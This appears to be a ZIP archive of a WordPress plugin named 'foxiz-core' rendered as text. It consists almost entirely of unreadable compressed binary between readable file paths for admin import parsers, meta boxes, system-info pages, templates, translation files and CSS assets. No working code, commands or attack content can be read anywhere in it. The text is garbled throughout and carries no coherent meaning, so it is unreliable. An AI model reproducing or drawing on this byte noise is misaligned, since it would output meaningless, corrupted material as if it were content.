˓oM3u3C^T ext2tϜ"3Lw^=SX4؃/3Hy"iB7Yt^ˈ/nqqaW.—#wቲFGM;3͇iV{3?zB/T$EfMd} @Jp^^*5V/s Czl8U%ݬQTy(#V""')8!hݾ{xul9>bzBCY{T@6=H.KB;m& w)]EqyYaPIhy^ Aq1M==>n@肋|:PTxb ($]4%ɡf-֋_r1Kf NV~\lku$ɜ溸 >5pӬ[?o` 1k5 /e.ˇ?L^M=_щ +˿NńSuLJr>qI盫m:m4(Y‹\3Vk/ Z̅,T:O,Y*zۅ,wih0 tJZoejy{K O3MS8Bfm$ H2JΌ2 N㸞wag`<[ 搉mιlX6T}.w[ڬ :n;~g ×l$o`__iZiyޞ=I3|$֋}I_6Q6hGF/sAi3rvڣf8CFc!}ŰĿ,(gdL>s30˅_ z'u(\z-nń-l=o>Se:8q˸ :tTj7C\/YCsޥrWŽ PMqoh ) V W} i[ItR,M d pػrڔ5*W{._iĮpP0`5NCzh o>ړ½}8G+m]ɷϱ|շ|諯Ìh`W#?JQ_Ln,>G@}BnAwj+%dSt:l֢w@ ',;švg`.|AW1ѻEwl)qD=xq $4b#>aYk*21_󤌎zIݼżi/0X<߀ԞU{%RlHkp:5z̩]қbT./{] ƕ}hw˅{oT/gN !q$xMĨY)WWɑP,_)]Lwa?ҏU%OGAk}1v0rJ0-c^9]&1ǫID#5AOF:=;[+ v{pfMoS5Itt5;;GHKCeHŠ*㕗uk i7BBy 8'!ѓ $< H!>Q!VMmuM8 $Ϳ3Q1qajk>qeM U/ N [zSѴ{ cE5ꈗ{W% V[`g##ӄn%;ᾙ +6o)є]TKԮFƦ=%,:ʕnF3ю+kL8ijQp¡pZ*|,ԇ-B PKruTR)i&foxiz-core/admin/import/lib/compat.phpTߋ1~+ h[^)ҧ> wЇR;jMHNG7}3wr-p+ ,Bj MYkͫ DcEOBpq.YsqVY4S(8K6W;@Y`zj(NEU>%Ǻrlqh%4Qd#v}FxS qtW9Nz4kĖDЗ5+KsqO|e=y\?c}|UզGg2~e VJs̊*QpZ(勇ՍgyU߄&Iu%F6$%K*ӂņH:xKaC|gnnZ8&e'UFV+i {qa8ߗ\?4:hH]dF[̫w0qǏ'(@]IW1BzRvf>XDk ss:F&S\ӍF^ ڳvW/PKruT_͜E'foxiz-core/admin/import/lib/parsers.phpj0Ew}ۜ֡vi BxuZP~eВ͛sHSA);FTVM -,\zӹ[c٫]]Kp=|ǼBjxFzh9WtRNrۿHI;J6}Ih ƍtKy4;#q5 ٹ PNI1>$'ಚά_ i0.-)qGط PKkT$foxiz-core/admin/import/lib/parsers/PKruTQY8foxiz-core/admin/import/lib/parsers/class-wxr-parser.phpUmO0EqELPaM.5ǎl vRAI=soLVEww#؅s^Xf0;= ixY ,QZf\໊3xQY)mQ}=!JC$[pb٘ɘv?^^Q So;cD]JggF&-EPҩqh@׳>,A-G].o/_]m~ Bui:1V+,IB  x6aY殪_n=:ʕ;Cܓ::D˸ 3j$ZtBT X}l$-h3DUF?Щn{=ٯtu|:+$lI<ٜV2̙_{4s{t]PKruT93 )>foxiz-core/admin/import/lib/parsers/class-wxr-parser-regex.phpZoF,kCđܗ6 WHPYeJ"B#̾Iyq7?}gOǢW$E>3v=`%jQtUfb%reZ5hK| Z UYTRT@?>]s+\u-jV:%*cOeWؐkve&i$ X V b!n~| UN*~7֌e9R,*<]TQ:WʀE*+ߛ8'jeZ??[:^|IKPI8L YR".Cl@GnnZTiyZg2\g@szKF{ >5V/JXEL;=,#L:rU$p1a ltD(7+} wf3SҨeT 8樅gt4Hou *utΐXs,bn$LoRìdV~!dm @Q \\+.%v /g.qu~ kҊ?'/MA*@l CmD!0"Be}HO0KHz6F6N|L4_ -2a YƆ,kCt+LVpM}ݎ<*.h) Mrb9pg\%24tc $RcxG)mQMdY(65f,iw}|M4FZ)I ҉:UCE '7Zc"㯀2R蝁qWc7)^c/v4;/:(RCjlClgd3 |,/`&;fK@u3yp4'Ӟipt/ K|lVd70eN \G /6n]n+4嚍6!wzc- 6;V߃dM>P!h; ǧ^&"'Y`x]-Ze%Y.n]Ua-pȥ.H$c X􌗥uE/Vi8ͯyΈc׫+ 4?O Vy.4uQMjDPDjMoLJI/f*&գ`9bBI~c8pp0JVӪbvKgoXtZZxlHٖf#W;wE[1I hػ~Ag Lj C3zԫk<%].Rk]@TZ0Ԟ5Bw[R2 CyZfɗn?6I}1T67{mj9-kRU f0} ʶJ )VU'%z;@(kMawdܽ…>=4l~ʶg:aûvd@+e5ld @Z=VFyvU5VY*! *+nQrx%򤘉pew3H7>ݻ8Oh5@Z,BXUXݹS:7H?;_GXj& .-79LKt:i ߚ t;C0Pqp WDoXڏOj@5YPnT@]ӌ((:"۫&.N ߫7O z}; s)ajՃ6]!& X_OJ:Ww߿wjJRk^ɱhͮTZC~av B|QvsGxvFri8¶F4{'o/=JMM [_qʩ- %c fk/? 7{:G1 !Qg^|?@Uj\KO](jn}uh@f5+mZ<&ҜJ MMz{# 'ڣj4Եi^vD5E]ouZ.<ʞ!7ue=}kUC2:c: l8_ /_zD_"+nḐ#lKx!XHDȪn+?C?R?A@!'iM+Mi坆`@ X+/~xM`.f=:j C;PKduT.RBfoxiz-core/admin/import/lib/parsers/class-wxr-parser-simplexml.phpYm6<`٩JCrq=eܡ[h[@Rm{g$RwoQTyf8/#4ŋ S-)bU&2 .,/B\uPT?ކYVIޕM-(?l=1kVOBV VaEc7a|S\+_?[*EgMKvEH>R쪩kqe./B  /!1TH $.lE%+qbub^ߐ.3/Z(h5߳%s$>w,eB$`#礨y&dqH} d+nLJd%ywV{ x^AAi^^צo*W&H曰"y)VG}I*> JPˆV nq\ ,NKiiUl1q7Au&i DcJ k'r-*έι~mT>VVD؟n# aK|Gk$ QHN\1^1QTL =ttr)}4>6m@+ʞ!AQO U"sJtfL:k!-ÌV/5#ӽL$tl(JW(SzXJqW?_?W18'KO T l3TZCP7kE֓ܮvȁtTh=' ;pRK:xj ,\?teMzDwƒ,:jݼ׵<~Gm!S!=O/~fLڃv|젅KpOXK5ъAsZ@_IYmz̋Lj2^⛭5B2n#"yF=R} Y!1E 15I  tVq )}YT;)zW#LjhUh?anh<7Ͱd/lˍSN<d o4 `7UL ʼw P]aPRhN%>CEw9ZD9-i`m9-9ڿlGg=k=+$C4CdHT^v )<T"iL?5 NtfP:0אB?5' L7}|C4EAKBnr"tU!a(q8d k?WY1yOl760@0 A;g?;yXaHe<񠾺~_8FwPMc߭yي*3tgWzFSj҂k,n C]ptcd<]3oj.p%S}eD7ޔҺb! &!HU-+9H, -R拈}ӃpJ<)HtL!MS @1,{g2ynY3@9 ^XݒkCuۚ`wQo-I^,MAƌ1lx뜅ղIGNN]AG[6!hQblWuHmiﴮNsӰ}ZҒ.2V<3myr&jg;mΟ>1|K|JC+,[RK"j|zmM NO:IKާlEB<Ҫ@E=ܕ'փ%^zCd'<>ת!I@a/Wo )|xߦ[V4 -a$UzTYA$(Iz_ dt=-jN#/݂7kWu Nҽ4-& qՖ+Һh*Ԍ(203ߢ#Ƅ`KOaO0*ZV~)A*K/zTHQnK+MIsr@* 6E\LQvߚQ/PWˆ .H쯏7,w|P~rc|,n&,jtNQsy8֬b`y<ǝWݘ%fd$9 T񹊠yf4cEs0` h֊@I`WF,C˚ R^@D6C7b:h3T5 cۀZ7'{ӽYZѢ-t[;bmdrn2l\ҌOJuհdistڲssͮ7'TtzBks Z&23q2G*`'US7ilA>ҹZ0 " e[CY&sZYiޥ5k0rNSaO\U^чwX7t\&u?f`Kj>޸32=#h}[_D%:*K;͓o+m=,CBp$ $Gdwk1,ÛY&HNt<і"~NKTdL ᇒwH8r^$EDV_Zdӧ@ս[{7-vTSG+9^JS^ovy(_1fE }w9ijӓC34'{FߝI_UG;6S2foxiz-core/admin/import/lib/wordpress-importer.phpS]k0}ICm ҍᒴ qoFo,iv>Lچ BL=ܣ_RNw98'H0.P0X# '+/TUnN >زK$GIEQ i(`Ae_b0V Cr gPPFZvqS/(Cu,P&5;85@kW'יP~@יG5XvFGb뵟b @d޵/M\o=]@>@ 1A)J&0?DlOpa]Д߸Ο3aHdV~ JCE!L9?>Y<E[xg ʩ6Ta4*D!F]KT)+3GoW{"eD7Z7`cZdwCXa۩ekn- D;U& 59؇%Xfy)2}=Hd$V$I+Z$"J[ӿɺkFyM=djge09kM<)sܜMIUlGZ5_mXPK\wTo&!foxiz-core/admin/import/parts.phpWo6~VfTvY:aeP4@ aZ:[DdQ#&GiwbDw};2o$bs2$ߑ,xH_?<>|##ʁ6Wz"xT,d˜ "B9˚%'!T%L d%;Ȇ #@pR*č~a? SﮁL^@1 /~4@2& 0Q4 13n7/_?tjc$ mǀ|H;8JKXlbiꗁRDG %R16bhn%ft,˜f%.3tW4%oamg<; ?2q N8*>Sdk}"dȱo#]$2# ft?QC9SJm*҂/} \Lj؋\Oo3ΕZZH? %ecO#<]-X&(`ق 2E ozVl֖LuJ&oÑIz *Q*?3q.@1WQBjτگce//KF[k5{!q=YSI]Xc;}6{gDDWܛҜ!.b7A,Π>ƋcC p. CL AJnbjͨn\SxÁ(WouJӚPGsh*kX6sQtSŁ)޴oz%? |) co0VQ)˞О p%P/1X; 53jRX4*fTi؅m][2ft4+ї=rP菌QDԙ$f)yWzz7xI_V+;[znc_ztV~mܴ- hGzߞc[ Mb ӏ!dkj3↡׶[珅ʋKOKm5SP*SJ8YXT,9W+dJJowۀOQj|s2r ̹KF%vjIž͵Q%h=ӀX-斸Jj↳١v&vhӪϳ%vh'Td4O(PKuT@I+foxiz-core/admin/import/radium-importer.phpْGy v`́7ac6AA%=v#ͬ:G0Xw?|ȞYP4b'%=<{'YbH2X뷯>`'9&ۻw4<*`ɛ7Q4݊yx.!>8ɜKr;GQETZ`ʋ:ɳ*\$)wQ͗y9{iEkw)SqTGI!H<+y^lY`峟a [%Qe%_gs~F..ξTC7QI ȹM&yVc'T-yidn%p7,Tmne iè 5K ::|nfyvPqk5ؿ.G+LnVQ4%K[d|N3M5Д,啑 edIDi o'ǢsD98cMH .Qs$>>P*X=y&ėr-VX Tx6ȫTSGC;f|!C7lcb R+ y@t./#3Ӌpif`"J+^Xbi `픍n/ܶ1{e< "-G)60f}^KQ:cNs00e6:0Њ:*Ѝ/mDX{BW97AԺ+)c|]*ȝ>qi Ax0//&t١DzbǞpر'v̄-@T?)3H8y"+j)8 NxM9 R!Ԑe@BӤ C8hu^>vE -OPȹPUcJ:uK'wo/VePXD|Y:)2=$hMRwW`  kqLC26RqqL N-[{Vsޏe@ʈ;D||$!HbbW}ZTutZ rڽ* "y~#]ZAe'H%Vido g}j[=Т y̠JDJJ(ֈHDS]z]EGtcqL~3HQ Qqy#7I*Х!"?8ֺZ˂pݤu"vktv3!]{vZFP5M}ahg?w8Rޤ[7-MQJ[g,8 \x4Üd! ܯ[60nk[i_##Ӟg: fc.)jnBճ_y훷Y %poi 957ũ8j:OW2걉e=w` TWc g_o49JVܱl9twWm! h]'Z&ԐxoA6i2;e\+?RHs‡76}:_%W Ri2 U+<e3NNKuBtb@̶Q{0hZ^ր 'S,Ant"DtNL\ҟدTOfvEcX9{C/pJSc̮s55(WU۪keϢzVY \zO0UK7 J>c^tC\G<'vgJ%W4ἁDXTUz-)CNhL[ؠ۔9PB/rYo=V j*1z!DY7PO!4 UM,!8{QIG(؃EkbK A0Ek!h!I>3ZlUX {03 2-/yJ7;N%:۩uWcb7d~O_9p-5:* `MSzڎMQ v{F8XE!SSQ߰vcReN0 BkI 5MY9*Bgk1)37v:I a+%Nh3&IL]9D:ͥe&n$fCtAA΀T%5^8$T fdc&s&1Ol _d(USF6}E^nu,/>֓;H:+I2uYnƺM{kL*e8=Hp(67U 0 8D]!sآaڵ܊Avr|'{br0>;K4B㸉H*+s, SΥSj;ZvJ0t%D+mRk5!C<SK@ݳMvMO$y%n$5`UI>4eaTڵϟX9{x{O%@up <~J>E< !$,~GfjS"=ڔhS1 ݝXaL!pra=ؑ' |pM8KZLXҲ4i⽖ p1) ܺ|h])zY -btمUUr,EY er++V̻6). RN@}|,'cV::6Z2 *νiQԳ/8gHaȹqJm1;VvlFW%L5rbEsz#B7RcxhKWl=E SA rhUgv;ԡm􌡌y䎎u=aaPDK_U3%T8ǻ~JKhN'Xg-ڊ E1Z8;Ũv$;|}EDu!`1ل]V{Ui 'K;zQJ@TPOX}E fHE]ڛE eeyuxtW9u nlC4HiWV WQG౒Rz;"sLj-:5l׫; gF凎-,mмlm|0S񧚄楜9mC[5'E u6QA?hg{/IqȨgv5s72?}w~+{ZwZ-ԔEJFW2BЛԎ6?, ^dX7C=P'<_8 |q⩩gOVDūs BO@ gf7vaJEBRRN,+\aahLcdu52|:uR51¸Zv_G>I 3>0g:s-k׏|q:WV S&n T#cZPKkT!!$foxiz-core/admin/import/template.phpXn7}DH$ХHReiPԆc (BwGZ»ZQ;jWӠ})Pp朙3CʳuQO?Z ZK+7|zr,AK0 7?zsǓ# 6kAEȄMRY'rQ͊^o7E.,f֞v2CkaT|Vχ٢pUXЦwژ6a(z98 1(a҂' cig2MlJ(6)<~ODRڅ0Ft{FDBBV h0c9y/S!>O,nK0/L8d"+=Wts:N=xwϽ_Q7{d1g!}=N!|+E#Na?P=znuw9.o X>~괇pt-:q9 Qtػ*B?1m{;@,\Z V,EvqR4RZ-%[C~ʍoٚGWXN+5r|Ov,{Z?k,rQZ)GhQv6X [6xNS5Ԙ#H%^_<.S 2po^fa}gzH{dv7sco.; Iч+l٫7iq#P@;7}"YЌ!Rrlqe)gK6B;w[rݜth'B{9uj{o"뵐n)_'/ߛ{{{2Xi^89閴ÖҊ6<nb_c4N{bKjs_n8@zҩwwt^w>xΒMPK|Rjfoxiz-core/admin/includes.phpͽ 0@:E 5 RV#mZw3|=%..;>/J0MI6lfHếei}L UiÃhU7_U7y8&C)u\9Wx- tہv˲cv ;l3pX@fVJjwA'% Җwd@*NSy!:E;`, Iѳl{BmE#oVJ,:RL(#d~"4\pAGvJAO~)PwqA6҅9#Q)^܉}:i㻜5 Ӷ\ߌ/a$9i&D V,ͳ9NA!_1ee';2 v ;%$γ^j(r9A" GPs @ ωMǁ (4axg"t s qA'H:a^nQ wD5X]Gg: qRчQ>ݡμ>&~QUQ#Gfn|,k *!Z|\Wy?|UD~JA,rD% /t#.RL'8n_fXW(9^}ħG?jTR0/gߟO?E?E{EDEjtΟq[ŏ\craPOG\Y<^vv!S7ӕ8Lzg*x!!'앑v(cI*fj }no6 -/j:x lNA* s-wa``yT&cFV*Žh4 .1Idfn~n.Qlí:Q_ oP:^'`BRq+V!!Sj-ᥭ) ۔JILMaԨ1P?we1F;e(ӣChfrE|!5ז ûNve=KLrlтOp4\Q{}ۢðVY:7;@/♯hW0[H;X>qflPܡ2ċw.2 -A9A5; udgmkKy@ ƓP2y$nn#K&ߧ=0x gw,shh֨ -^ }I⭑mwcX URHL >WF}7[u$v }anSv2/퍑TY#[GNilľxߣe]\_B#F@a^Í#hT neww'-'=!2VAG}F($@{Yn ju`wYSg.? 3PW4.کշ"o]ʇ#^g+mfonvg{"aY miS] n3]_o Iei‡:|5~uv!EZ  i|!q+pgEo(/#;d?x[<}}K{b|.R] vN#3Qx v=S O ŴjKAڀXq}/IwWfT0 y؍=:@Sab`P.D/7 7nn;VGL2T9{<'+-Am [@=rD8ҩ Nw]io~@[&ݿs8Es|C&۶rV,سd!ue+*٧py83UݻA~DPKsBT3z 5'foxiz-core/admin/rb-meta/assets/meta.jsks8;U ;qk l- Xr$ܣX*53eH_$۲esU*3Rn<w<z#yOO݃7G%yG,,y)];s ^]QR|rP,c; dUt|ê wqR3Kԗ ̓K>0oN3km5=)=Yi%RfҔtI{C#?s+}%xsI EBLmi^RWgU"?N)-{."J8#+W(p\Oi0l)$XhXZ {BWQrku ϋ2/uT -ͣrMϢWd$}^͢YC %V PFEAˎlJ*dKy@,6j<+PpU3*fsK4BLVG-SE0!V,K4ZE%spVD5ϧ ,}%uUVT Pw\1Hcn=w`I{A, NiT >U^w 4mu~wleΫ3hA5mQ=iě([^ &L+eP 3#[>h=o~tt*vzQp}ф黎Ȍ_4_#uPX&M&,Pδp Fle7[fE>%X8(4&VES %<7hZ(2娒xn?z/2ڵ >b& Yb3( k\h`&CJ+ǵ4@X^nZ\Ho'8N T)3̂v2(>ΨaJ5ߐG䞓]Ò%UCW)^ '|#\S0VSCMcO.9n=iWuL#y}{C7>:; vB[Rv yoN?WH#ns9jmThFRknbLQY@oZ|SoYRr? úL0,|H x0xXaX=d ^UG{xdD{ ޣ`I.J[YK\Fnm2Ƌkq3ᲭwGjoSLgk_e!)QlYFe4%6޿j! j(򊻊a^Xx Y5hbԄCPip%teC_F˄OrP\9$Y6Up]`#p< p%o(*'+xgO 2,:~7 Xę(Ş8=!)!,DJQ<6伶'Rs 6msqc|.R1BgXvDVP`+:cRR*,r@{w^}D\;R /1t&t ʽL=M^8OTn-R#GX ɰ=xS%RNd^?h}'E'T,E\qzŴٜzՔ7^'2swV}qUT}]}O9b(xem@'3Z [Lf \0/ǰP 4#vZNv<ԨgxrLa))2j]`aٖe^ZUI΄UEU'Kcp(ٌ0f|Ү/׋dYQ"C'CeÄ -s's #5{R}wluܑɄ87 LCG6^9~Ȋߊ"X<_js|Wkf=7b;-h[;;sM*wG `fwre]m Gl$ʘ腡mN'? Nlsn39qc{jگglg?|VƮ)efR<M"\IfHęrqA\^#"gn9@5eo ylYsZ󆘴˂FvXW)F^>>D`MW*shS'ri07(cQk֑s*M %:9ک{7Ii4p [_鮪,КX2nԧOnA/9n|MW%. XY _WPKT;|$foxiz-core/admin/rb-meta/rb-meta.php=ksF*1WPh*M]d)Ĺ[WmvSIꮮ:H E @Yڍu)9T,r_/,7OL?*Q"IY|^w'ق3EE/Ǘ9bG?>9Y}ɻO4Lt p_})%bYf׼&R|qzG`ls>\%嚭[Q;IEv{tF 4iv^sǺQt:;Y%pi6,~Y:g-`LE% ĎOGnc-򸚗٦ P-uV7AY2oCo*]4 1&.O:^*M^rPx]pۆ0 #x)_Nji@,Cɯm\k/dGݤ@Ԑk('Cz9"M^2N.뼘%9%bƄ| 0NG[z 0jRYRqοq)y*e0v%m1&fQIܖ䚯nb(u[҅H96{7S蜝~XA[-sVJ<0f&ufÓ5V\FR HX>E(",^$K JW$" A۲krTs5\~!u À?J<9ߘq]$lzw}ldyMyg3"$Z)9#) wʭ)QFL],uW9LOڷŭ:RpkInXZ00peVY}IBz.\قew{nK9lE f5TnWrpVbmdd\CFTfo@r%bb5QcdM0n^(4\h[kp$2,^44qjb\ɁV0GLdn^.6}7a#8Ho<Jv"L_+aZ/"w`Z#Z-uATbH #XY j[D4j4NoJ;GZ=cZ?_.Fvxlq'6`dLdt!(-0k-^ ="C`?c>-WF9Co֤ v.\vK3zF*WNS,v o&R\ 5ס-U#D{@F07,PDHh0[[!M,-Ȓ*yZ$ eʝE`6=g }h4D8RR  E\hY\siyl>60\Mh9h#L>4[Zz?:{RV/RFhr%P|9f9䫫.OOzut  VP 0ey/pi̇.I& ќQd̗CHnQ!E |c|66C/nr>Ds7Q4@auH[-qvF<U"}qHrfi<#SHB;TU`b,ZkEGȆ>͸ujWK4WXǰZݚ=9N%#CGF|Y)aʩ]LN"y6ߡXiTjrP\z4co` TFS5Sww! !Of<@,ÿ7hKz>N{ `V``V`[hu ̶!-lQ2-K/[_W" Shd ~!;Cѷ; ° @tӾ'|;8I.ƣoBzH}\.W;.lL$tS;Q` #pvtLߊa#iwt~TPVagFܭn); 1)-<#FAC@` TIC:؃bb%ڦDYGiQ7-Mu^QVSr(GBo4BO11KXYcr‘(;(̐J5€y6^l dTgy0;2I҈{$hCS59}0鷙焺U:&ATkY~v Ps&ISL *CS]~$dU:X}ؔV?g$짖ʅm4קS! >ߚcNzkNdYox{iLcYil>7Oi9-gm޳@qm1>ec$FGmCT֓S)9NK@m0쉯*RdLCƠ'^~} Lq=WUh{NyV* (K{@UT>#Ty?CTЏ!" z)-'VÇOX꯬?ۍt#Zǩ*nʋp7uOOF%ww[a0dؔ'dM&!:΂\Qk{ nMȟ^{Tcߛ=;$} m1&=DLG9Q$avZ/yLmKBLQGɤQdH>I7HXr:_XZ2jODr.^e+NownX5l#-JE|7߂)BDQTr/s 8f鉦⃌rɟRQee}eU~Px+#܆z~1XER{]XzIXk}w{!3 ce;g!*t.HN悘? $Vge6Mm3֯{ߤM:x7iSXy伆bh 5g GߡIH s@֮F8iGlȋ>balj8'\C 2tdhϧYLdnSo)~rT*aĄH[Y99a:;V>+s'{Q ̟h-O*5818{o#A$#A馯36/@+L2c]a$Y`rĪ BSϏ_c8߿$]4IܳF;4ۇ\<'Pvk`آ iQm2FK@kqO7hi% 5K2weNUbҊWnt *Bx׍ E#^*wz刅k2|t֭H< ݬ8?d#=X4J,Z 7PNжXvԂۻ*{'17ioUӾ};?I?4驧WdKt@w)LNArY2"h16BVN?|dboyۆPKkTfoxiz-core/admin/system-info/PKASDRJ,foxiz-core/admin/system-info/system-info.phpWmO8J9 mW` ݫ>ܝ,'q[8JNEx<8_?t} 2!"B⁉{CP$<\W>-,VV;D2iMXn6w Z=HҳKφ'?z+էCd+U0# ~J~^,g~Y!4hxyVKhHm3Jv+sȠ 5|\^$"Y7J g\ě-,ȩLFc2:i-qܿϨ&[:cG"w9PpFY|(y1OBGf?׾X,eZK"A)f"3 SmŨ?Ғ/u~2'۝{_/Tqyn*uj&JԂ]zE"ؾ+2yq'J<:{3c,rr%!q+H6WAcϔ š SHFn[zKƨ`XDRHq<i;|n)WCbv2SjRJ!TSX}[]-s5:VHO GA7PM ̝k , x]Ç7pma'WW]X#>i#֔@\ ظf=cCOLi:ƒ\}k8k<ښXp|zzrdQN ˆRH,I9RW1M7ם=\J{5F4!{mзUry'' r0?Z/VAWjA0/s[ehlӈMq0i`7M9E@= |*^ym#9Z>Z.-VRzrsox9 _D_-lPvby;W`H %AsyXy:,3clZlrd5E-귛v8w;(o*V uf@?PK8YTYf )foxiz-core/admin/system-info/template.phpUMk@=01&rL㏐҃{3$C)bUKWbwc $[-`f53o޾A,:` H8pa0rr Q-bpBއq^:> 7_;لDY;0c 07,(7AxIn6 h0q CSbmR]X?H$c #(}Z L`16A+`R?ցEBco`s$rRS)*RT st,,|@zS&Ê'7'H9/hJi4CAҜ:ҲJU=:}%_rWBu"*WQi!4s>ˆK6dưCܖ@-",J`/t=jE=Bh"x(6__ bo_ 'aΌx%f{c̜3ĢeGA%ڔp6}G3GBO?q[ѲgV-;ET\F+FsZ/3k?Akϳ {|+ۢ^L"um`+xPKTP`Efoxiz-core/admin/taxonomy.php\{s8[w2N(HvjnmǨ3lgqhHzݷ @Q8s{4_? @>~Q.ʇFO>)bye/-qɂI^-E-e:eӕŒl,I<ყ>Hg>KstY/?%d=ʣ4CHC~02bF(f͂2U!TDfTcR.6 PNg)ÞSYTY~>eA9UUˈ.2`clOeZ,EVSeNG#(NiٞNIZqE*Z*Lu`lzZYwi):qD1 ,Q2쳸+/gw9'^63c쏭qɷW{8dE PbFi"L8Z>wWiR8O@Wך6VZ`4qnU5;砢9tUU3&W;; B<҈_UaY\m$ЖeK.U݁IJFD+-ߚe?*d׵ >MŷhUk!H"+2]#195 [abu`qEa +<& 蚱݃5p]V<5Ox%2͓rq%+IvMo'~ǎߏXȆΤC{G#=qUԷ .õG nmC/ɫɿB. |qʁp9Y`5x # y<]tA0~_Böխ {Sn٢qp}}jVUzL(m/9vLiե\Ծg{+p1(?Qm8 ChhiVp^IdkB+M@eIKvޣp=b`3[Qta;G I5vchepszn'&w$~#leh@G׌gݞ.t9g*ðS~޴_5ucaߟ-{͏⩪<`̙hӅ͝'ޫ=^xI۶:/b@P%S-ݨƺbgC 1^if8n5d ς*)lVr4$J lA0kDErSة~ Ă^A M7l|6Q5M! @Pǃn${H(ّ@i6l"G YR9e94a{C1}P8%+DӋGH&$ z<ЌH4ՏN4VbqeEo(O߽AgF?cqXsnQ?k3r%ϓ2))"k= l񎗝+5S1M݊igwớ. n7PoU\]Hc&]xoh鍥; C׭['v޺EoIt7ae9̟W VM ag!m{8;x+@ ZpPE`Fp^e*`9KjB*=>6n$|H,^\ `7\p*N`-5|]S3:$14wCU vpr%<#,A@9G`\13G%/ʁriضB# )j L–W4H$+)}L7%Qbl5էJC~Y@ZT6-ivK%ܲ{NwʧE|hE׽6l,uד/"ަipaVV{^ `@@CDd3zC~6=Yn,øڬ)xKF>4O{H#UŒ% )_D[[5iKԂV>D u Ju=Ri@IOme`[Bps/ &Hw,Bˋ|ހwD.֯^9",dC5&`zWcJvLHuH2֣iЎu 48eG"rLQCa$5ݕ@^79īۀ  ؠo=s6POY&!T֘B>"i`ln ێǔE;úsoE txlo֘s@|CcMSCˡV Tt4|hS! s>O5ۆ_Cآpl?k0͢(sZ*)LH zU:[۫fv=JI6 Ihm  CfZu_vSҖGR39+TΈyUJ Uzfl1Vg!5?Z=!5/Ydžh&ԃCUi+:TMcUE%jLGSAHf:z+Wޝ]47;XIz_[9^8Ӹ5s:LPHmTS/t8j!qZ'т92+<crJ5!// m1-y`ί ry%˫I*g>KμbME`I% ~BTwj-ƵE=A1n 9#ck)* O}7>c7zX#cӳ>9:UcE4i4_nP?nei"|!Շ |=;zX)Ww wt u-Mu#`u.Ӂgn~y@0:Hh ǰnܚޢk/ɷIm!ƍ֣}SЕMqӗxڠmb$/Hp% 4d5s[\qk-7ba8_/4o; Hdy}jսEzߑY[X kn; ҋ58XE`KX /4!sP2=/oζ Omo+5x܆%Q2aNX\M2ySNshfiuJ,emb+֬!]@ VR{]ךsi[G0o/(@\v7xe5`)UAyGPpɛ{" *~ʷ1Yÿy {>~v*- |7)CN!|X#A: 2*,J4y 5~==<4_D{Vy̸3ҍhb_Kc$s3/zkhܔzyR9`GȤvl;ZLh>|«$k2\,˰͈iҩ 3{fRzǡ {~@P1d+YS~YjN>|ù{1W%7!F@mۮ0i>:Hcl^^%T.>C竊|DKҘ~Pky_JXpV@LVoCXAD/ِ\{@noNu B, 5݇/ByWmeYeਖ਼iR,B{etPK;L?4E*ƞs:({B Z3ߙ9?S|)G!:`jͺu~y[kOPKkTfoxiz-core/admin/templates/PKh_wTj$foxiz-core/admin/templates/links.phpJ0;t-ӖUAԆI7M]w7悰q؍aIO 4ʡ ja W` 6k7%0_YQ|G,"u4~VO2Dvtۜ2֡3nOkQ}2 ^9j-LO xN+ o&bЖ B#Ri.e8fhlGܽ^h@DwOË(b?PKkYTI b-foxiz-core/admin/templates/template-panel.phpX[OF~&R@8Q$A[}@CUYgܙ1!3KaöTT!Ab7;a~'x4;?RL EqI7p>x p \`t no&pF?ǣ#|r<2]-ǣyğ L O LbG/&"T~.Jyrna, \$J&C():& O富|VK]r>#Y &>"Ox, U֨X dǽ\ =s Z,ʸ(U0Sf0ș2ƽO,Q{VGÌxp5!DIBV]Rs9Z=rI3Tu2eď9#JRܱ}f-#6_'rJU˿6E) ( C\)LPCץ fȨl#"ϥ2ӃpΫm ;rbA&˥6; 9Ur_w@*NHbsLm!5;V,Ӕ0[G(wS*!/T3A(#lf-sLat[~0gz T!&2BXx>:A> ,G-\RRX~£7XuVƗҮY[Z1 cwe-/V+-WU_>Un&8kah(fCT_U1{W1R{1e(Ӧm[p݃~9y@zmM:HA0^x f\۶N;XTIˎMa*htN[k>M?*)!:t|[[t\C"3q;_^;޻_kϛ]" {|klp*&!54H0Vh^d($ 8c'V|}W=PvԛAuV{*=8(fBBQJn/wCZO?76>%6%L Jƭ/{?Kl 6R i*{f*ohɮzKҀAW/t{ v뫝#}+C(+^YSi\{hd̬H*m5z^ PKAS!0foxiz-core/admin/templates/validate-redirect.phpu]O0pjm[(Ee6.rƚc[ MsEb=5.0mE(IaZ晪Pa VՏx~ >):ϳ?yv\T!\LvA={q?Y7(*)~2!d|Z.z!AZy+I=BXmԯ{9xS-hsr{Fmޛ(8Ի$h;R=lc}m)IuL/D[-G93< U/W s#Zbh٥jy_;dUSLME1V5<:琋Gl=lJk<ٖ8c 4~%u 86xD7>KdT`n=@! 1l?Ezi(zGFVy}% dUƯUK}w g`y[d&uz$dY0 AExbyMHU}VⳣQAuU8kLpvBXtL$Jjº!"AfB3& R`om%_9j $?dYJ֮k|K q'Zudԙnؘ#ag&.76g+mWfLh3~N{m0euct:M,Ğuբam-t9 hύ[YP2* FD%e;B)?]ܺl<-v=!|ʘ|@=uwwG}ӔSSk+*]17:_PKyS ,foxiz-core/admin/translation/translation.phpV[o"7~)]! +MnZF1`xfǞ6DDQ>>ﮊMqѝ M.xN2pre+GߠY%7wן~J~v莩Epѵ>W,ɉbHAE* ]%k)'#"\ځAD)*2>7?vo|AS(O")KfNZrYU"50NsP/T-NGRNk`6L: T鴡j|>՚*mZ_ƜIs1uJR A]#;gPp$ uZbSrVh6Y;8K =4 mЉ)ɫ5X.GB.,NBݕHЮ {I@$hO\?Y{tsg-%Y2^"ٖ L hsԂU:(- |*'^69^9-Kb@y\=j<uS׽k4@68@%Źf G%blDʫ W6Z]%[+"%4wiTI 8Ox⟔iBՙsd^ Jq[Rlٟ -kcͽQM TDh֢Osq. YDJp}TP`Mꢳ:U9湀fBWtk"ѝay5 Xǰya% ˒{t,E@vbw8(^7|QOvJ#'F(a!P3؊l m>OÇog Nĺ%CN}_e>adCZc2 c 37Wzh<_xZ@5X{O:8L9{ GLN$f^;ʇ s}T U]CH t,zl^}fSz-V9zY7Jn`f~!3(߅A?5 zSN;u9O }5mzDLVY_I7 )C]Y\|{ocPKkTfoxiz-core/assets/PKdiT't"foxiz-core/assets/admin-screen.cssW{O8UuH6vVﱇ8N{~c'Ϋxf8lm&%+cJX(W///7> $KD%T/^HUmƞ[ ]趫 }YT֭:ip^6ss6ev S=&4riٳ }MP$ 